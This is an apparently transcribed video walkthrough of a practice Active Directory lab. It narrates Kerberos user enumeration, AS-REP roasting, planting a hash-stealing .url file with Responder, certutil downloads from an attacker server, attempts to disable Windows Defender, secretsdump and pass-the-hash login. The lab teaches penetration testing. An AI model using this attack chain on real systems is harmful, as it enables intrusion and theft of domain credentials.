Welcome back. In today's video, we're going to start tackling down the challenge labs from Cyberseclabs, and most of these labs, as you can see, are Active Directory, Linux and Active Directory, but most of them are Active Directory, as you can see. So we start with sync, which is an Active Directory, of course. Here is the IP, and it's powered on. These labs are considered difficult and not easy, so I hope I can illustrate the solution in the most simple and effective way. So first we did a scan for the machine. So here is the scan command, and we got a couple of open ports, the typical open ports for an Active Directory machine. We have the Kerberos, we have the SMB, we have RDP, and that was about the scan. So how are we going to start? We don't have an HTTP server. There is no FTP. There is no SSH. We have only RDP to start with, and we have the SMB, and we have the Kerberos. So how we're going to approach this is a bit different. So basically, first we're going to tackle down and see what are the shares on the Windows system, and see if we can access some share, or if we can't access some share, see if we can we have some write permissions on some share after authentication. So let's find out about the shares on the machine. So basically, let's go up, and here we're going to use SMB client. The backslash. Okay, so I'm going to put 4. Then we're going to put the IP address. The IP is 172. Where's the second? 31.3.6. I put 4 backslash, and we start. So here it's asking for the root password. We're going to assume that there is no authentication and find out. Okay, so we have a list of shares. We have sys netlogon IPC department. So the unique share is department. So usually we get the same shares every time we list them, right? So the unique one and the different one in this case is department. So the next step now, we're going to try to access this share and see if we can get an unauthenticated access, right? So we go back, sudo SMB client, we're going to remove the -L. And here I'm going to write department. So here we have connection error. Let me remove 2 backslashes. So we get the same. Oh, okay, I have a typo here. So N. Okay, so we are authenticated, luckily. So we can now access the shared department and see what is in there. So we can type ls. So inside the departments, we have accounts, development, IT, marketing, sales, the typical shares you would find in an enterprise environment. So basically here, let's find out what's in there. You can continue enumeration, actually. You can go to cd accounts. There is nothing in there. Cd back, cd IT. So there is nothing in there, right? You can continue and carry on the enumeration of these and see what's in there, but I couldn't find anything, so I moved on to the next step. So basically, we have enumerated now the shares, and we saw that we have access to the department and the subfolders, but we haven't found anything of interest, like plain text passwords, string credentials. There is nothing like that in these subdirectories or subfolders. So what's the next step now if if we have finished from the department, or if we saw that there is nothing to do with the shares? So if you go back to the nmap scan, we see we have Kerberos here, right? 88. So one of the ways we can enumerate more and find out more about the system is to try to brute force the users using Kerberos. So if you have heard about Kerberos, it's a way to authenticate to a Windows machine by using the system of tickets. So basically, you can also enumerate and find out the usernames and their tickets using Kerberos brute force. But before doing that, why would we need to do that, right? Why would we need to have an access to a regular user? So basically here, we want to, since we didn't find any plain text credentials in the SMB shares, we want now to try to place a payload in one of the shares. So basically, in order to do that, we need the right access. And unauthenticated users or anonymous access, I don't think they have right permission on the shares. Put test txt. So as you can see, the access is denied. We can't upload files. We can only read files. We can only read the directories. So that is why we need an authenticated login to these shares, right? So we can upload a payload. That's the only way to do this machine. So that is why we're going to resort to Kerberos brute force, right? And try to find a valid user with a valid ticket. So for this reason, I'm going to run a tool called Kerberos Linux AMD64. This tool will brute force the available users on the Active Directory and their valid tickets. So we want a valid user. Once we find a valid user, right, we're gonna try to find the password hash and the ticket for this user. So first we're gonna start with the Kerberos to find the valid users. Okay, so basically here we're gonna now type, let's list the files. So we have the script, which is here. Let's give it permissions, sudo chmod plus x. Okay, clear, okay. Now Kerberos, and then we're going to specify the user enumeration. We want to find the valid users, user enum, and then we're going to define the domain name. So we get that from the nmap scan. We go down, as you can see, here is the domain name, DNS domain name, which is sync.csl. So sync.csl. Then we put the domain controller IP address, which is the regular IP for the machine, 172.31.30.6. And here we specify the word list. So for this purpose, I'm going to use cyclist. So user share word list. So cyclist, and then we're going to go to usernames. So we have the usernames and then names. And we're going to select names. And let this run. So what do we have now? User enum, flags, word list. Okay, so it seems like we have supplied more than the required arguments. Accepts one argument, received two. So we forgot to add one dash here. So I added the dash. So we're going to run the tool now and see what are the valid usernames on the Active Directory using Kerberos pre-authentication. So let's see that. So the tool has finished and only found one user, which is Clark. But I believe there are more than one Clark, more than one user, I'm sorry. So basically we need to use another word list. So here we use names. In this case, I'm gonna use as well. Sometimes we need to use more than one word list. So here names, and we go back. We have as well the top usernames shortlist. So we're gonna use that. Let's go back. Usernames, top. Let's try this now. So we get another two users, guest, administrator, and there are only two. So as you can see, as we insert more word lists, we find more usernames or more accounts. So I have guest, administrator so far, and we have a Clark. I believe there is another account. So the account is in the common admin, as this one. Let me check on it. Nope. In the CART. So basically here we're going to replace usernames. This one, CART. Okay. So here you can see we have manager. Okay, I'm going to stop this here. So basically, we have tried more than one user list, word list. So the valid accounts are Clark, as you can see, and we have guest, administrator, and also we have manager, right? Oh, okay. So now the next thing, now we have a list of valid usernames on the Active Directory. So the next step now is to find the password hashes of these users. But don't forget that we found the valid usernames through Kerberos. So in order to find the valid hashes, we need to carry on the same method with Kerberos. So we need to we can't use John Draper, we can't use these cracking tools. We don't have anything to test with actually. We have only Kerberos. So for that reason, we're going to use another tool to try to brute force these Active Directory users and list out the ticket granting tickets, their Kerberos tickets, and their NTLM hashes if applicable. So for that reason, and since we are working with Kerberos, we're going to use a tool from Impacket. I'm going to show you the tool now. So I'm going to leave this here. I'm going to clear that. I memorize the word list in my name. So clear. So ls, I'm going to go to Impacket. Where's Impacket? Impacket. Okay, Impacket. Go to examples. So we have a tool here, which is, get NPU users. So get NPU users is a script to get the NTLM hashes and ticket granting tickets for users on the Active Directory system that do not have a property called do not require Kerberos pre-authentication. So basically, there is a property in Kerberos. If you search for this, let me go back. Don't require Cypress Preauthentication. So you can read more about this. And this tool or this property, if it is disabled for a specific user, we can obtain their hash or ticket. So Cypress Preauthentication, why it shouldn't be disabled? Okay, so here you can read more about that. As you can see, they're saying by default, the KDC requires all accounts to use pre-authentication. This is a security feature which offers protection against password guessing attacks. The AS request identifies the client, blah, blah, blah. So why, when you don't enforce pre-authentication, malicious attacker like us can directly send a dummy request for authentication. The KDC will return an encrypted ticket granting ticket, and the attacker can brute force it offline. That's what we will do here now. We have a list of users. We saw in the last attempt. We're gonna try to send dummy requests to the Active Directory, right? And see if the Active Directory system returns a ticket granting ticket for a user that doesn't have the pre-authentication enabled. I hope this explanation is clear. So I'm gonna minimize this, and then I'm gonna hop in directly to the tool. So here, sudo Python 3, and then we're gonna use get np, right? So you can specify the domain controller dc-ip 172.31.3.6. Then we can specify the domain controller DNS name, which is sync.csl, and then we're gonna put slash, and here we'll specify the user file, which we haven't constructed. So let's go back. We'll specify here dash users file, and we specify the name of the file that contains the users that we have just found. So here, let's put one here. So we have guest. I forgot to output this. Okay, so we're gonna type them from scratch, CSL, and we have administrator sort list, CSL, sync, CSL, manager at sync.csl, and the last we have a clerk at sync.csl. So here we're gonna save that and name it users AD. Okay, click save. So where is the list? I see the list in, okay. All right, so user AD. Now I'm gonna get back to the terminal and specify this users AD. So now the next step here, we're gonna copy all of that right from here. This is the ticket, the granting ticket, or the response we got from the server. We're gonna copy that, and then we're gonna go back. My lovely mousepad, gonna paste this here. I'm gonna save it as let me name it the TGT response and save that to desktop. Okay, now we have this here. Let's go back, and now we're gonna use hashcat to crack this. So we copied the password here, and the next step now, we have a password and we have a user. Now the next thing is to try to authenticate to the SMB shares. Why? Because we want to plant a payload. So now we use the Kerberos possible options. We harvested the usernames on the Active Directory. We retrieved the ones that don't have the pre-authentication set, and hence we cracked their password. And the next thing now, we don't have anything other than trying this. We have the RTP, but I don't think RTP will work or will give us any leverage on the text box. Sorry, on the Windows box or the Active Directory box. We're going to try now, since we don't have right access to the SMB shares, we will try to have an authenticated access by using the manager and the password we have just had. And only then we can try then to implant payloads on the SMB shares. So this is the command, here SMB client, I defined the share, and here I used 2 backslashes, the user is manager, and here we supply the password. Now we are logged in, so we type ls. So right here we have the shares that we have just seen in the beginning of the video. So the bottom line now, we're going to try to upload a payload in every single subfolder or in every single subshare here. So the type of payload is not we're not going to create this with MSF Venom. We're going to do something called the SMB attacks. So you're going to plant a file, or you're going to call it SCF File Attacks. So to understand what I mean by that, I found this page here, SMB share SCF File Attacks. So here you create a file, and you put this file in every possible or in every public share you have. And then you here start a listener on your side, and then when a user browses to the shares, their password hash will be sent to your listener. That's in the simplest possible way to explain that. But the idea behind this, you can read this here, the page, and you can create the file and put it in the shares. You can try it. But the thing behind this is as you can see here, it's saying if a file share doesn't contain any data that could be used to connect other systems, but it is configured with the right permissions for unauthenticated users, then it's possible to obtain passwords, hashes of domain users or meterpreter shells. Now, when we had the unauthenticated access, we couldn't put files. But right now we have an advantage because we have unauthenticated access with the user manager. So right now we're going to create a similar file to this and put it in the shares. So once we put that in the shares, we will be receiving the password hashes of every user, right, who browse to the shares. That's the condition. Okay. So let's go back and create this file. It should be in the it must be in .url extension. So here, as you can see, there are some specifications to this file. Let's go down. Okay. So put this here. And now we're gonna split the view. So here we're gonna type sudo nano. Let me name it sc. Let's name it, okay. Sync sc.url. All right. So here, let's go back to the page. So shell command icon file. All right. So we're gonna use, instead of shell, I'm gonna use something different. So here, let's type, okay, let's type shell. Then we define the command, the icon file, taskbar. All right. So here I'm going to define something different actually. So basically here URL could be desktop. The working directory could also be desktop. Let's go back. The icon file. And here we're going to borrow the backslash again. In here I'm going to put the here it should be our IP address, I guess. Let's go back here. Yes. So basically here, let's see our IP, find out. Ten 10.07. So 10.07. And here. And here we're gonna put something like test.icon index equal 1. Okay, let's go back and make sure everything is correct. Saving the pen tester file as SC file will make the file to be executed when the user will browse to the file. Adding the add symbol in front of the file name will place the pen tester lab on top of the shared drive. There are two files, as I can see. Okay, let's save this. So now we have this one. Now we're gonna go here. Oh, first let's launch the listener first. So we're gonna here launch a listener with responder. So here sudo responder -i 10.07-v. Interface not found. If config, the interface is LO. No, it's tune 0. Okay, so here we're gonna instead of the IP, I'm gonna put tun 0. Okay, now we are listening. Let's now put the file, this one, in the directories. So we're gonna close this one, and in here we're gonna put the SCF file in the top. So here put at sync.-sc.url. So if you list here, you can see the file is here. And now we should be able to receive the NTLM hashes after a while, of course. So let's go back here. We did everything according to the guidelines. Where was the page? Okay. So here is the page. The responder is running. All right. Let's see. Okay, so I waited long enough, but I didn't receive any hash in this case. For some reason, I couldn't identify, actually. I don't know why. So it might be something to do with the connection or something. I couldn't find out why. In the first, when I first did the lab, I received it rather quickly. So we're not gonna wait too long. I'm just gonna here show you the password hash. Of course, when you receive the hashes here, you're going to receive them in the NTLM form. You're going to use John the Ripper or Hashcat to crack the NTLM hash the same way we did previously. But now we're going to log in directly with the password I had before. So basically, which is the one before the last step actually. So I'm going to stop this. Go down here with clear. So we're going to use sudo winrm. And now we're going to substitute the values that I got from the first try. So basically here, dash u, the user will be sysadmin. That is the user you will receive when you put the SCF attacks here on the shares. And you fired the listener. I think it works only the first time. If you retry or reset the machine, for some reason I couldn't receive the hashes. But if you are doing that for the first time, I'm sure you're gonna receive them. Okay, so the user is sysadmin without quotes. And the password is, of course, you're gonna crack it with John the Ripper, the same way we did with the ticket granting tickets. Now we're gonna define the host. Okay, let's find out. All right, so now you're logged in as sysadmin. My user. So I am sysadmin, and this is my identifier. Now, as we logged into the Active Directory right now, and we have some kind of limited privileges, we can attempt all kind of enumeration. Enumerating the groups, the users, the organizational units, defining who is the administrator and to which group they belong. But we have found this beforehand, and we know that there is an administrator user on the system. And now, to escalate our privileges, we can also run here WinPiece, download it here, and see what are the possible vulnerabilities or the privilege escalation vectors. But for now, for this video, we can't do this over and over again for every time. I'm going to jump right to the way to escalate your privileges. We're going to use Mimikatz to launch an attack called DNS sync attack, which kind of attacks that, how can I explain this? I'm going to put a page that explains this attack, but basically this attack is kind of a part of kill chain where an attacker can simulate the behavior of the administrator or the domain controller, so as to retrieve the passwords via a process called domain replication. So we're going to attempt that. Of course, you can read more details about this. I'm going to put a link to that. But now let's download Mimikatz. So here we're going to, again, split. And now sudo Mimikatz. Let's make sure. Mimikatz trunk. x64. Okay, give it to me here. Now I'm going to close that. Okay, so sudo python 3-m http.server. Okay, now let's download this tool. Cert util-url cache-f http 10.10.0.7. And here we put Mimikatz And given that we are a sysadmin, yes, we are not the highest privileges, but we are a user that can run mimikatz. So we have a problem here. The script contains malicious content and has been blocked by your antivirus software. Okay, that is great. It seems like we can't run mimikatz because the machine has antivirus. So that is a pretty realistic. That's good. Yes, so if we can't use mimikatz, we can also use secret dump.py to run this. So basically, but secret dump needs to be downloaded here. So we're gonna go back, exit this, cd or sudo cp in packets examples secret dump, and we're gonna copy this to the desktop so we can download it. So we have the tool here. Great. Now let's launch the Python listener again. Okay. Now, all right. So here, set-util, and instead of mimikatz, I'm going to download secret dump. Secret dump.py, and here we're going to put also secret dump.py. And again, we got some issue with the antivirus here. Okay, I think we need to disable the antivirus. What kind of antivirus is this? I think it is Windows Defender. So here, the only way to get around this is to disable the Windows Defender. Let's use a PowerShell command to do that. So set np reference. Okay, then disable real-time. No, it's time. Monitoring. True. Of course, in a real case scenario, when you get access to a remote machine, the first thing you want to do is to disable the antivirus. So here we got some issue with that. Access denied. Okay. Let's try to uninstall Windows Defender from this machine. Windows feature name Windows. So here, as you can see, success, false, restart, no, failed. So we couldn't. Okay, so we couldn't do that. Unfortunately, the antivirus is preventing us from exporting our tools to the Windows box. Okay, so So what we can do now, all right. I think the only way to do that, let's try, okay, without evil win RM, let's try to use secret dump without logging in. Okay, so here we're gonna disable this, or okay, let's quit that. Clear. Okay, cd in packet, cd samples. So here we're gonna run secret dump again, but from our local machine. Let's see if this works. Secret dump.py, and here we define the DNS name sync.csl. I don't think we need this anymore. Let me close that. Okay. Here we need some username and password. So we have the sysadmin and we have manager, if you remember. So here I have milkshake for manager, and I have the second password was, and here we have this password for sysadmin. If you remember, we got these passwords by doing some brute force on Gripros and the file share, the SMB file share. So let's try to do these passwords without the administrator password. Seems like the machine has got antivirus which prevents us from poking around with our tools. Okay, so here we try with sysadmin. Then we need the password. Let's go grab the password, which is this one. I don't like this. Okay, so here we put open quotes, the password. Here we define the target, which is 172.31.3.6. Sudo Python 3. Okay, access denied. So we can't use the sysadmin with Python, with secret dump. Okay, let's use the manager app, the manager user, and here we grab the password, which is milkshake. So here we remove this, paste, and let's try. Okay, so the manager user has worked with secret dump. And luckily for us, we didn't need to do that from within the low privilege shell we got. We were able to grab the hashes only using secret dump, given that we have some details here, username and password. So basically we have the administrator, we have guest, and other users. So the only thing we want to escalate our privileges is the administrator hash. So we're going to grab the hash here, and then we're going to use evil win rm, sudo evil win rm -u administrator -h. I'm going to use the hash directly, and then -i 172.31.3.6, and it worked. Why /user, and we are the administrator on the system. Now we can do whatever we want with the Active Directory. A later step, this is bonus of course, if we enumerate, let's ipconfig, let's see if there are other networks attached to this Active Directory. So basically we have only one. Regular or normally or usually sometimes in the enterprise environments, when you type ipconfig, you would find other adapters or other networks connected to the Active Directory, like the internal boxes or links to other servers in the DMZ spot. So basically, when you find that you have more than one network in ipconfig, you need to start some kind of network pivoting where we set up our proxies and we start interacting with the other clients in case we are required to do that. Okay, so that was a pretty tough machine actually, but we have used many tools and I'm sure we have learned many stuff in this challenge. And don't forget that to read the page that talks about the SMB share attack. I'm going to share the link in the video description. And of course, yeah, that was it. And of course, there will be a documentation for this video. So if you aren't a member of this channel, just subscribe to the membership and you will get documentation for every video.